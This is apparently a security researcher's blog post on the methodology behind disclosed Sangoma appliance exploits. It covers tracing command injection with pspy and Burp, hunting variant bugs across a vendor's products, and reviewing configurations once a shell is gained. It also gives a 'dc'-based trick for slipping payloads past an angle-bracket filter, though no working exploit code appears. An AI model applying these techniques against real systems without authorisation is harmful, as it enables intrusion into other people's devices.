Process/Whatever Notes from the Sangoma Research.

This is part of a series of posts on the Sangoma exploits I released at BSides Basingstoke 2024.

This post is just to note down a couple of the "process/methodology" parts. It isn't exhaustive, or even nearly complete, but it should give an idea as to how I was working.

I do intend to - once I've published more examples with other vendors - eventually write a proper article on my methodology for exploring network appliances and suchlike with the goal of finding bugs.

pspy + burp repeater = command/argument injection findings.

This is absurdly simple to do, and should be part of everyones manual testing cycle when it comes to web apps that you suspect contain shell command injection issues.

Your first step is to drop pspy on the target and run it, piping output to a file.

Your next step is to go through every single input/parameter and send a unique, findable string with a prefix you can grep for to the app. Use Repeater for this.

Leave pspy running and interact with the application "normally" for a while also, to find "second order" issues. These may be a bit harder to track down 😄

The last step is to grep for the prefix in the pspy log and see if any of your "inputs" showed up in a processes command line. If they do, correlate them to a request in Burp.

Now you have some potential shell/argument injection issues to follow up on, and a good idea what input and endpoint caused what command line to run. This will massively narrow down where you need to spend serious amounts of time on code auditing.

You can also just fuzz these inputs with a bunch of shell metacharacters and use pspy to see if anything works, instead of auditing code.

This is actually how I initially noticed the TabbyPass issue - I was putting in random username strings and monitoring pspy in another terminal window, and noticed "something", which lead me down the path of code review to work out what the hell was going on. It also helped a lot with finding all those shell command injection problems.

Now, there is a potential way to automate this whole process in Burp using either an extension or a BCheck script. Here is how I would do it. I've written a couple of attempts at this, but nothing I'm happy with yet.

  1. Have Burp simply shove a unique collaborator URL into each input field "automatically" as a scan rule.
  2. On the target, have something watching the pspy logs for collaborator URL's. If it sees one - send the log entry as POST data to the collaborator URL.
  3. On the Burp side, raise an issue of "User input passed to command line", with the data sent to Collaborator and the responsible request.

You could probably replace pspy with some eBPF shenanigans or hooks and catch stuff like file creation bugs/file writes/reads in the same kind of way, doing OS level IAST, but that is a whole fucking tangent for another time - and probably worthy of a whole research project.

Hunting for variants across products.

When working with multiple products from a vendor, when you find something in one place - odds are you will find it somewhere else, or something similar, as vendors have a habit of using the same code across multiple products.

It is also worthwhile searching for prior-issues in a product and look for incomplete fixes, or if fixes were applied to other products by the same vendor. Had I been aware of the prior work by the folks at Appsecco, I'd have been able to find the TabbyPass issue a LOT quicker.

Another example is - when I found the "session hijacking via directory listing" issue in the VideoMCU, I was able to quickly spot that it also impacted the NTG product, which uses largely the same codebase. Implementing the NTG exploit after working out the VideoMCU one took minutes of work.

There are a few other potential "duplicate issues" across products that I have not yet had time to properly validate and document.

This also came into play with the "modules" in FusionPBX - finding one file read/write issue lead to finding the same issue because of shared code in other modules.

Start with a configuration review.

Once you have a shell to work with - via SSH or some jailbreak - on an appliance, your first port of call should be checking configurations.

See what services are running, if they are exposed externally (verify with a port scan), and where their configurations live. This will massively cut down on effort and usually will point you in the correct directions.

In this research it told me that nginx ran as root on one appliance, gateone ran as root on another, that sudo permissions were written by an insane person, and where to start looking for the actual application codebase on the device.

Configurations can also give you hints at how to find the target devices on Shodan or whatnot.

Comparing netstat -peanut to nmap output can tell you if there are potentially "locally exposed" targets that might be reverse proxied or reachable by SSRF or similar.

Relatedly to the above point about prior art and variants - its worth checking if anything running has known issues. Read bug trackers.

Keep notes of old tricks.

With the VideoMCU and NTG appliances, the command injections were restricted by an extremely annoying "filter" applied to form variables that blocked angle brackets.

Luckily from a piece of prior work I had done - I had a very simple "encoder/decoder" using the "dc" command line calculator to convert a payload from hex back to ascii without angle brackets on the target.

Had I not remembered this trickery, I'd probably have had to run multiple injection attempts to stage a payload onto the target.

I'll leave it at that for now. The next post will basically be a wrap-up of this project (for now) where I try count all the bugs, etc.